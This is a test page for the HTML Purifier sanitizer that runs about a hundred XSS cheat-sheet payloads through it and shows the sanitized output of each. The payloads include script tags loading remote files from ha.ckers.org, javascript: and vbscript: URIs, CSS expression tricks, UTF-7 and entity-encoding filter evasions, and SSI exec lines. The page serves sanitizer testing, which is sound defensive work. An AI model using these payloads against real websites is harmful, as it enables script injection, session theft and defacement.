HTML Purifier XSS Attacks Smoketest (XSS cheat sheet)

HTML Purifier XSS Attacks Smoketest

XSS attacks are from http://ha.ckers.org/xss.html.

Caveats: Google.com has been programmatically disallowed, but as you can see there are ways of getting around that, so coverage in this area is not complete. Most XSS payloads announce their presence by spawning an alert dialog. The displayed code is not strictly correct, because line breaks have been forced for readability; line wraps are marked with ». Some tests are omitted for your convenience. Not all control characters are displayed.

Test

Each test is one row with four columns, which appear here flattened in this order: Name (the test label), Raw (the payload fed to HTML Purifier, wrapped with »), Output (the sanitized markup HTML Purifier produced, shown escaped), Render (that output as a browser displays it). A row whose Output and Render columns are blank means nothing of the payload survived sanitization.
XSS Locator
';alert(String.fromCharCode( »
88,83,83))//\';alert(String. »
fromCharCode(88,83,83))//";a »
lert(String.fromCharCode(88, »
83,83))//\";alert(String.fro »
mCharCode(88,83,83))//--></S »
CRIPT>">'><SCRIPT>alert(Stri »
ng.fromCharCode(88,83,83))</ »
SCRIPT>=&{}
';alert(String.fromCharCode( »
88,83,83))//\';alert(String. »
fromCharCode(88,83,83))//";a »
lert(String.fromCharCode(88, »
83,83))//\";alert(String.fro »
mCharCode(88,83,83))//--&gt; »
"&gt;'&gt;=&amp;{}
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>=&{}
XSS Quick Test
'';!--"<XSS>=&{()}
'';!--"=&amp;{()}
'';!--"=&{()}
SCRIPT w/Alert()
<SCRIPT>alert('XSS')</SCRIPT »
>
   
SCRIPT w/Source File
<SCRIPT »
SRC=http://ha.ckers.org/xss. »
js></SCRIPT>
   
SCRIPT w/Char Code
<SCRIPT>alert(String.fromCha »
rCode(88,83,83))</SCRIPT>
   
BASE
<BASE »
HREF="javascript:alert('XSS' »
);//">
   
BGSOUND
<BGSOUND »
SRC="javascript:alert('XSS') »
;">
   
BODY background-image
<BODY »
BACKGROUND="javascript:alert »
('XSS');">
   
BODY ONLOAD
<BODY ONLOAD=alert('XSS')>
   
DIV background-image 1
<DIV »
STYLE="background-image: »
url(javascript:alert('XSS')) »
">
<div></div>
 
DIV background-image 2
<DIV »
STYLE="background-image: »
url(&#1;javascript:alert('XS »
S'))">
<div></div>
 
DIV expression
<DIV STYLE="width: »
expression(alert('XSS'));">
<div></div>
 
FRAME
<FRAMESET><FRAME »
SRC="javascript:alert('XSS') »
;"></FRAMESET>
   
IFRAME
<IFRAME »
SRC="javascript:alert('XSS') »
;"></IFRAME>
   
INPUT Image
<INPUT TYPE="IMAGE" »
SRC="javascript:alert('XSS') »
;">
   
IMG w/JavaScript Directive
<IMG »
SRC="javascript:alert('XSS') »
;">
   
IMG No Quotes/Semicolon
<IMG »
SRC=javascript:alert('XSS')>
   
IMG Dynsrc
<IMG »
DYNSRC="javascript:alert('XS »
S');">
   
IMG Lowsrc
<IMG »
LOWSRC="javascript:alert('XS »
S');">
   
IMG Embedded commands 1
<IMG »
SRC="http://www.thesiteyouar »
eon.com/somecommand.php?some »
variables=maliciouscode">
<img »
src="http://www.thesiteyouar »
eon.com/somecommand.php?some »
variables=maliciouscode" »
alt="somecommand.php?somevar »
iables=maliciouscode" />
somecommand.php?somevariables=maliciouscode
IMG STYLE w/expression
exp/*<XSS »
STYLE='no\xss:noxss("*//*"); »

xss:&#101;x&#x2F;*XSS*//*/* »
/pression(alert("XSS"))'>
exp/*
exp/*
List-style-image
<STYLE>li {list-style-image: »
url("javascript:alert('XSS') »
");}</STYLE><UL><LI>XSS
<ul><li>XSS</li></ul>
  • XSS
IMG w/VBscript
<IMG »
SRC='vbscript:msgbox("XSS")' »
>
   
LAYER
<LAYER »
SRC="http://ha.ckers.org/scr »
iptlet.html"></LAYER>
   
Livescript
<IMG »
SRC="livescript:[code]">
   
US-ASCII encoding
scriptalert(XSS)/script »
scriptalert(XSS)/script
scriptalert(XSS)/script
META
<META HTTP-EQUIV="refresh" »
CONTENT="0;url=javascript:al »
ert('XSS');">
   
META w/data:URL
<META HTTP-EQUIV="refresh" »
CONTENT="0;url=data:text/htm »
l;base64,PHNjcmlwdD5hbGVydCg »
nWFNTJyk8L3NjcmlwdD4K">
   
META w/additional URL parameter
<META HTTP-EQUIV="refresh" »
CONTENT="0; »
URL=http://;URL=javascript:a »
lert('XSS');">
   
Mocha
<IMG SRC="mocha:[code]">
   
OBJECT
<OBJECT »
TYPE="text/x-scriptlet" »
DATA="http://ha.ckers.org/sc »
riptlet.html"></OBJECT>
   
OBJECT w/Embedded XSS
<OBJECT »
classid=clsid:ae24fdae-03c6- »
11d1-8b76-0080c744f389><para »
m name=url »
value=javascript:alert('XSS' »
)></OBJECT>
   
Embed Flash
<EMBED »
SRC="http://ha.ckers.org/xss »
.swf" »
AllowScriptAccess="always">< »
/EMBED>
   
STYLE
<STYLE »
TYPE="text/javascript">alert »
('XSS');</STYLE>
   
STYLE w/Comment
<IMG »
STYLE="xss:expr/*XSS*/ession »
(alert('XSS'))">
   
STYLE w/Anonymous HTML
<XSS »
STYLE="xss:expression(alert( »
'XSS'))">
   
STYLE w/background-image
<STYLE>.XSS{background-image »
:url("javascript:alert('XSS' »
)");}</STYLE><A »
CLASS=XSS></A>
<a class="XSS"></a>
 
STYLE w/background
<STYLE »
type="text/css">BODY{backgro »
und:url("javascript:alert('X »
SS')")}</STYLE>
   
Stylesheet
<LINK REL="stylesheet" »
HREF="javascript:alert('XSS' »
);">
   
Remote Stylesheet 1
<LINK REL="stylesheet" »
HREF="http://ha.ckers.org/xs »
s.css">
   
Remote Stylesheet 2
<STYLE>@import'http://ha.cke »
rs.org/xss.css';</STYLE>
   
Remote Stylesheet 3
<META HTTP-EQUIV="Link" »
Content="<http://ha.ckers.or »
g/xss.css>; REL=stylesheet">
   
Remote Stylesheet 4
<STYLE>BODY{-moz-binding:url »
("http://ha.ckers.org/xssmoz »
.xml#xss")}</STYLE>
   
TABLE
<TABLE »
BACKGROUND="javascript:alert »
('XSS')"></TABLE>
   
TD
<TABLE><TD »
BACKGROUND="javascript:alert »
('XSS')"></TD></TABLE>
   
XML namespace
<HTML xmlns:xss>
<?import »
namespace="xss" »
implementation="http://ha.ck »
ers.org/xss.htc">
<xss:xss>X »
SS</xss:xss>

</HTML>
&lt;?import namespace="xss" »
implementation="http://ha.ck »
ers.org/xss.htc"&gt;
XSS
<?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"> XSS
XML data island w/CDATA
<XML »
ID=I><X><C><![CDATA[<IMG »
SRC="javas]]><![CDATA[cript: »
alert('XSS');">]]>

</C></X> »
</xml><SPAN DATASRC=#I »
DATAFLD=C DATAFORMATAS=HTML>
&lt;IMG »
SRC="javascript:alert('XSS') »
;"&gt;

<span></span>
<IMG SRC="javascript:alert('XSS');">
XML data island w/comment
<XML ID="xss"><I><B><IMG »
SRC="javas<!-- »
-->cript:alert('XSS')"></B>< »
/I></XML>

<SPAN »
DATASRC="#xss" DATAFLD="B" »
DATAFORMATAS="HTML"></SPAN>
<i><b><img src="javas" »
alt="javas&lt;!-- »
--&gt;cript:alert('XSS')" »
/></b></i><span></span>
javas<!-- -->cript:alert('XSS')
XML (locally hosted)
<XML »
SRC="http://ha.ckers.org/xss »
test.xml" ID=I></XML>
<SPAN »
DATASRC=#I DATAFLD=C »
DATAFORMATAS=HTML></SPAN>
<span></span>
 
XML HTML+TIME
<HTML><BODY>
<?xml:namespace »
prefix="t" »
ns="urn:schemas-microsoft-co »
m:time">

<?import »
namespace="t" »
implementation="#default#tim »
e2">
<t:set »
attributeName="innerHTML" »
to="XSS<SCRIPT »
DEFER>alert('XSS')</SCRIPT>" »
> </BODY></HTML>
&lt;?xml:namespace »
prefix="t" »
ns="urn:schemas-microsoft-co »
m:time"&gt;

&lt;?import »
namespace="t" »
implementation="#default#tim »
e2"&gt;
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"> <?import namespace="t" implementation="#default#time2">
Commented-out Block
<!--[if gte IE »
4]>
<SCRIPT>alert('XSS');</S »
CRIPT>
<![endif]-->
   
Cookie Manipulation
<META »
HTTP-EQUIV="Set-Cookie" »
Content="USERID=<SCRIPT>aler »
t('XSS')</SCRIPT>">
   
Local .htc file
<XSS STYLE="behavior: »
url(http://ha.ckers.org/xss. »
htc);">
   
Rename .js to .jpg
<SCRIPT »
SRC="http://ha.ckers.org/xss »
.jpg"></SCRIPT>
   
SSI
<!--#exec cmd="/bin/echo »
'<SCRIPT SRC'"--><!--#exec »
cmd="/bin/echo »
'=http://ha.ckers.org/xss.js »
></SCRIPT>'"-->
   
PHP
<? »
echo('<SCR)';
echo('IPT>aler »
t("XSS")</SCRIPT>'); ?>
&lt;? echo('alert("XSS")'); »
?&gt;
<? echo('alert("XSS")'); ?>
JavaScript Includes
<BR SIZE="&{alert('XSS')}">
<br />
 
Character Encoding Example
<
%3C
&lt
&lt;
&LT
&LT;
&#60 »

&#060
&#0060

&#00060
&#000 »
060
&#0000060
&#60;
&#060;
& »
#0060;
&#00060;
&#000060;
&# »
0000060;
&#x3c
&#x03c
&#x003 »
c
&#x0003c
&#x00003c
&#x0000 »
03c
&#x3c;
&#x03c;

&#x003c; »

&#x0003c;
&#x00003c;
&#x000 »
003c;
&#X3c
&#X03c
&#X003c
& »
#X0003c
&#X00003c
&#X000003c »

&#X3c;
&#X03c;
&#X003c;
&#X »
0003c;
&#X00003c;
&#X000003c »
;
&#x3C

&#x03C
&#x003C
&#x0 »
003C
&#x00003C
&#x000003C
&# »
x3C;
&#x03C;
&#x003C;
&#x000 »
3C;
&#x00003C;
&#x000003C;
& »
#X3C
&#X03C
&#X003C
&#X0003C »

&#X00003C
&#X000003C

&#X3C »
;
&#X03C;
&#X003C;
&#X0003C; »

&#X00003C;
&#X000003C;
\x3c »

\x3C
\u003c
\u003C
&lt;
%3C
&amp;lt
&lt;
&amp;L »
T
&amp;LT;
&lt;
&lt;
&lt;

& »
lt;
&lt;
&lt;
&lt;
&lt;
&lt; »

&lt;
&lt;
&lt;
&lt;
&lt;
&l »
t;
&lt;
&lt;
&lt;
&lt;
&lt;
 »

&lt;
&lt;
&lt;
&lt;
&lt;
&l »
t;
&lt;
&lt;
&lt;
&lt;
&lt;
 »
&lt;
&lt;
&lt;
&lt;
&lt;
&lt »
;

&lt;
&lt;
&lt;
&lt;
&lt;
 »
&lt;
&lt;
&lt;
&lt;
&lt;
&lt »
;
&lt;
&lt;
&lt;
&lt;
&lt;
& »
lt;

&lt;
&lt;
&lt;
&lt;
&lt »
;
&lt;
\x3c
\x3C
\u003c
\u00 »
3C
< %3C &lt < &LT &LT; < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < \x3c \x3C \u003c \u003C
Case Insensitive
<IMG »
SRC=JaVaScRiPt:alert('XSS')>
   
HTML Entities
<IMG »
SRC=javascript:alert(&quot;X »
SS&quot;)>
   
Grave Accents
<IMG »
SRC=`javascript:alert("RSnak »
e says, 'XSS'")`>
<img »
src="%60javascript%3Aalert(" »
alt="`javascript:alert(&quot »
;RSnake" />
`javascript:alert("RSnake
Image w/CharCode
<IMG »
SRC=javascript:alert(String. »
fromCharCode(88,83,83))>
   
UTF-8 Unicode Encoding
<IMG »
SRC=&#106;&#97;&#118;&#97;&# »
115;&#99;&#114;&#105;&#112;& »
#116;&#58;&#97;&#108;&#101;& »
#114;&#116;&#40;&#39;&#88;&# »
83;&#83;&#39;&#41;>
   
Long UTF-8 Unicode w/out Semicolons
<IMG »
SRC=&#0000106&#0000097&#0000 »
118&#0000097&#0000115&#00000 »
99&#0000114&#0000105&#000011 »
2&#0000116&#0000058&#0000097 »
&#0000108&#0000101&#0000114& »
#0000116&#0000040&#0000039&# »
0000088&#0000083&#0000083&#0 »
000039&#0000041>
   
DIV w/Unicode
<DIV »
STYLE="background-image:\007 »
5\0072\006C\0028'\006a\0061\ »
0076\0061\0073\0063\0072\006 »
9\0070\0074\003a\0061\006c\0 »
065\0072\0074\0028.1027\0058 »
.1053\0053\0027\0029'\0029">
<div></div>
 
Hex Encoding w/out Semicolons
<IMG »
SRC=&#x6A&#x61&#x76&#x61&#x7 »
3&#x63&#x72&#x69&#x70&#x74&# »
x3A&#x61&#x6C&#x65&#x72&#x74 »
&#x28&#x27&#x58&#x53&#x53&#x »
27&#x29>
   
UTF-7 Encoding
<HEAD><META »
HTTP-EQUIV="CONTENT-TYPE" »
CONTENT="text/html; »
charset=UTF-7"> »
</HEAD>+ADw-SCRIPT+AD4-alert »
('XSS');+ADw-/SCRIPT+AD4-
+ADw-SCRIPT+AD4-alert('XSS') »
;+ADw-/SCRIPT+AD4-
+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
Escaping JavaScript escapes
\";alert('XSS');//
\";alert('XSS');//
\";alert('XSS');//
End title tag
</TITLE><SCRIPT>alert("XSS") »
;</SCRIPT>
   
STYLE w/broken up JavaScript
<STYLE>@im\port'\ja\vasc\rip »
t:alert("XSS")';</STYLE>
   
Embedded Tab
<IMG »
SRC="jav\tascript:alert('XSS' »
);">
<img »
src="jav%20ascript%3Aalert(' »
XSS');" alt="jav »
ascript:alert('XSS');" />
jav ascript:alert('XSS');
Embedded Encoded Tab
<IMG »
SRC="jav&#x09;ascript:alert( »
'XSS');">
<img »
src="jav%20ascript%3Aalert(' »
XSS');" alt="jav »
ascript:alert('XSS');" />
jav ascript:alert('XSS');
Embedded Newline
<IMG »
SRC="jav&#x0A;ascript:alert( »
'XSS');">
<img »
src="jav%20ascript%3Aalert(' »
XSS');" alt="jav »
ascript:alert('XSS');" />
jav ascript:alert('XSS');
Embedded Carriage Return
<IMG »
SRC="jav&#x0D;ascript:alert( »
'XSS');">
<img »
src="jav%20ascript%3Aalert(' »
XSS');" alt="jav »
ascript:alert('XSS');" />
jav ascript:alert('XSS');
Multiline w/Carriage Returns
<IMG
SRC
=
"
j
a
v
a
s
c
r
i »

p
t
:
a
l
e
r
t
(
'
X
S
S
' »

)
"
>
<img »
src="j%20a%20v%20a%20s%20c%2 »
0r%20i%20p%20t%20%3A%20a%20l »
%20e%20r%20t%20(%20'%20X%20S »
%20S%20'%20)" alt="j a v a s »
c r i p t : a l e r t ( ' X »
S S ' )" />
j a v a s c r i p t : a l e r t ( ' X S S ' )
Null Chars 1
<IMG »
SRC=java\0script:alert("XSS") »
>
   
Null Chars 2
&<SCR\0IPT>alert("XSS")</SCR\0 »
IPT>
&amp;
&
Spaces/Meta Chars
<IMG SRC=" &#14;  »
javascript:alert('XSS');">
<img src="" alt="" />
Non-Alpha/Non-Digit
<SCRIPT/XSS »
SRC="http://ha.ckers.org/xss »
.js"></SCRIPT>
   
Non-Alpha/Non-Digit Part 2
<BODY »
onload!#$%&()*~+-_.,:;?@[/|\ »
]^`=alert("XSS")>
   
No Closing Script Tag
<SCRIPT »
SRC=http://ha.ckers.org/xss. »
js
   
Protocol resolution in script tags
<SCRIPT »
SRC=//ha.ckers.org/.j>
   
Half-Open HTML/JavaScript
<IMG »
SRC="javascript:alert('XSS') »
"
   
Double open angle brackets
<IFRAME »
SRC=http://ha.ckers.org/scri »
ptlet.html <
   
Extraneous Open Brackets
<<SCRIPT>alert("XSS");//<</S »
CRIPT>
&lt;
<
Malformed IMG Tags
<IMG »
"""><SCRIPT>alert("XSS")</SC »
RIPT>">
"&gt;
">
No Quotes/Semicolons
<SCRIPT>a=/XSS/
alert(a.sour »
ce)</SCRIPT>
   
Evade Regex Filter 1
<SCRIPT a=">" »
SRC="http://ha.ckers.org/xss »
.js"></SCRIPT>
   
Evade Regex Filter 2
<SCRIPT ="blah" »
SRC="http://ha.ckers.org/xss »
.js"></SCRIPT>
   
Evade Regex Filter 3
<SCRIPT a="blah" '' »
SRC="http://ha.ckers.org/xss »
.js"></SCRIPT>
   
Evade Regex Filter 4
<SCRIPT "a='>'" »
SRC="http://ha.ckers.org/xss »
.js"></SCRIPT>
   
Evade Regex Filter 5
<SCRIPT a=`>` »
SRC="http://ha.ckers.org/xss »
.js"></SCRIPT>
   
Filter Evasion 1
<SCRIPT>document.write("<SCR »
I");</SCRIPT>PT »
SRC="http://ha.ckers.org/xss »
.js"></SCRIPT>
PT »
SRC="http://ha.ckers.org/xss »
.js"&gt;
PT SRC="http://ha.ckers.org/xss.js">
Filter Evasion 2
<SCRIPT a=">'>" »
SRC="http://ha.ckers.org/xss »
.js"></SCRIPT>
   
IP Encoding
<A »
HREF="http://66.102.7.147/"> »
XSS</A>
<a »
href="http://66.102.7.147/"> »
XSS</a>
URL Encoding
<A »
HREF="http://%77%77%77%2E%67 »
%6F%6F%67%6C%65%2E%63%6F%6D" »
>XSS</A>
<a>XSS</a>
Dword Encoding
<A »
HREF="http://1113982867/">XS »
S</A>
<a »
href="http://1113982867/">XS »
S</a>
Hex Encoding
<A »
HREF="http://0x42.0x0000066. »
0x7.0x93/">XSS</A>
<a »
href="http://0x42.0x0000066. »
0x7.0x93/">XSS</a>
Octal Encoding
<A »
HREF="http://0102.0146.0007. »
00000223/">XSS</A>
<a »
href="http://0102.0146.0007. »
00000223/">XSS</a>
Mixed Encoding
<A »
HREF="h
tt\tp://6&#09;6.00014 »
6.0x7.147/">XSS</A>
<a »
href="h%20tt%20p%3A//6%206.0 »
00146.0x7.147/">XSS</a>
Protocol Resolution Bypass
<A »
HREF="//www.google.com/">XSS »
</A>
<a>XSS</a>
Firefox Lookups 1
<A HREF="//google">XSS</A>
<a href="//google">XSS</a>
Firefox Lookups 2
<A »
HREF="http://ha.ckers.org@go »
ogle">XSS</A>
<a »
href="http://google">XSS</a>
Firefox Lookups 3
<A »
HREF="http://google:ha.ckers »
.org">XSS</A>
<a »
href="http://google">XSS</a>
Removing Cnames
<A »
HREF="http://google.com/">XS »
S</A>
<a>XSS</a>
Extra dot for Absolute DNS
<A »
HREF="http://www.google.com. »
/">XSS</A>
<a>XSS</a>
JavaScript Link Location
<A »
HREF="javascript:document.lo »
cation='http://www.google.co »
m/'">XSS</A>
<a>XSS</a>
Content Replace
<A »
HREF="http://www.gohttp://ww »
w.google.com/ogle.com/">XSS< »
/A>
<a »
href="http://www.gohttp//www »
.google.com/ogle.com/">XSS</ »
a>

 

Author: Chuck Lu (GitHub)